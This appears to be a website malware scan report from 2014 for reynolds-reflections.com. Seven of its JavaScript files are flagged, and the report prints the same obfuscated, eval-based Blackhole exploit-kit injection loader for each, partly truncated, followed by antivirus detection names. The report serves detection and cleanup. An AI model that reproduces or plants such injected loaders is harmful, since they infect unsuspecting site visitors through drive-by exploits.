New scan:

Malware Scanner report for reynolds-reflections.com

Malicious/Suspicious/Total urls checked
7/0/20
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "reynolds-reflections.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=reynolds-reflections.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.reynolds-reflections.com/
200 OK
Content-Length: 4101
Content-Type: text/html
clean
http://www.reynolds-reflections.com/intro.js
200 OK
Content-Length: 10873
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/home.htm
200 OK
Content-Length: 6263
Content-Type: text/html
clean
http://www.reynolds-reflections.com/javascripts.js
200 OK
Content-Length: 79
Content-Type: application/javascript
clean
http://www.reynolds-reflections.com/pop-closeup.js
200 OK
Content-Length: 14677
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/mouseover.js
200 OK
Content-Length: 10100
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/menu.js
200 OK
Content-Length: 11033
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/header.js
200 OK
Content-Length: 11331
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/sidebar.js
200 OK
Content-Length: 11381
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/copyright.js
200 OK
Content-Length: 9841
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

ezvw="fr"+"omCh"+"arCo"+"de";if(document.querySelector)kggf=4;wgl=("3f,85,94,8d,82,93,88,8e,8d,3f,99,8a,8f,4f,58,47,48,3f,9a,2c,29,3f,95,80,91,3f,92,93,80,93,88,82,5c,46,80,89,80,97,46,5a,2c,29,3f,95,80,91,3f,82,8e,8d,93,91,8e,8b,8b,84,91,5c,46,88,8d,83,84,97,4d,8f,87,8f,46,5a,2c,29,3f,95,80,91,3f,99,8a,8f,3f,5c,3f,83,8e,82,94,8c,84,8d,93,4d,82,91,84,80,93,84,64,8b,84,8c,84,8d,93,47,46,88,85,91,80,8c,84,46,48,5a,2c,29,2c,29,3f,99,8a,8f,4d,92,91,82,3f,5c,3f,46,87,93,93,8f,59,4e,4e,51,50,55,4d,55,
... 3509 bytes are skipped ...
,84,83,7e,94,90,46,48,5c,5c,54,54,48,9a,9c,84,8b,92,84,9a,72,84,93,62,8e,8e,8a,88,84,47,46,95,88,92,88,93,84,83,7e,94,90,46,4b,3f,46,54,54,46,4b,3f,46,50,46,4b,3f,46,4e,46,48,5a,2c,29,2c,29,99,8a,8f,4f,58,47,48,5a,2c,29,9c,2c,29,9c".split(","));rmetp=eval;function jtmu(){uplsbz=function(){--(lhzi.body)}()}lhzi=document;for(ivnbbd=0;ivnbbd<wgl["length"];ivnbbd+=1){wgl[ivnbbd]=-(31)+parseInt(wgl[ivnbbd],kggf*4);}try{jtmu()}catch(mkh){cnsge=50-50;}if(!cnsge)rmetp(String[ezvw].apply(String,wgl));

Antivirus reports:

AntiVir
JS/Blacole.EB.116
Avast
JS:Iframe-DNV [Trj]
Ad-Aware
JS:Exploit.BlackHole.NC
Bkav
MW.Clod471.Trojan.784f
Ikarus
Trojan.JS.IFrame
nProtect
JS:Exploit.BlackHole.NC
TrendMicro-HouseCall
TROJ_GEN.F47V1013
Comodo
TrojWare.JS.Kryptik.AOH
Emsisoft
JS:Exploit.BlackHole.NC (B)
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
HEUR_HTJS.HDJSFN
Microsoft
Exploit:JS/Blacole.OA
Kaspersky
Trojan.JS.Iframe.afs
MicroWorld-eScan
JS:Exploit.BlackHole.NC
Fortinet
JS/Kryptik.AOH!tr
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.chulnr
F-Secure
JS:Exploit.BlackHole.NC
AVG
JS/Exploit
Norman
Blacole.WQ
GData
JS:Exploit.BlackHole.NC
Commtouch
Trojan.OMEN-7
ESET-NOD32
JS/Kryptik.AOH
BitDefender
JS:Exploit.BlackHole.NC

http://www.reynolds-reflections.com/copyright-allwebco.js
HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 13 Oct 2014 00:42:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://templates.doteasy.com/errorpages/error404/
200 OK
Content-Length: 10599
Content-Type: text/html
clean
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
200 OK
Content-Length: 93435
Content-Type: text/javascript
clean
http://www.reynolds-reflections.com/js/selectBox/jquery.selectBox.min.js
HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 13 Oct 2014 00:42:24 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://templates.doteasy.com/test404page.js
404 Not Found
Content-Length: 1245
Content-Type: text/html
clean
http://www.reynolds-reflections.com/js/jquery.watermark.min.js
HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 13 Oct 2014 00:42:25 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://www.reynolds-reflections.com/js/fancybox/jquery.fancybox.js
HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 13 Oct 2014 00:42:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://www.reynolds-reflections.com/js/fancybox/helpers/jquery.fancybox-media.js
HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 13 Oct 2014 00:42:26 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://www.reynolds-reflections.com/about.htm
200 OK
Content-Length: 7804
Content-Type: text/html
clean
http://www.reynolds-reflections.com/contact.htm
200 OK
Content-Length: 8193
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: reynolds-reflections.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: reynolds-reflections.com
Referer: http://www.google.com/search?q=reynolds-reflections.com

Result:
The result is similar to the first query. There are no suspicious redirects found.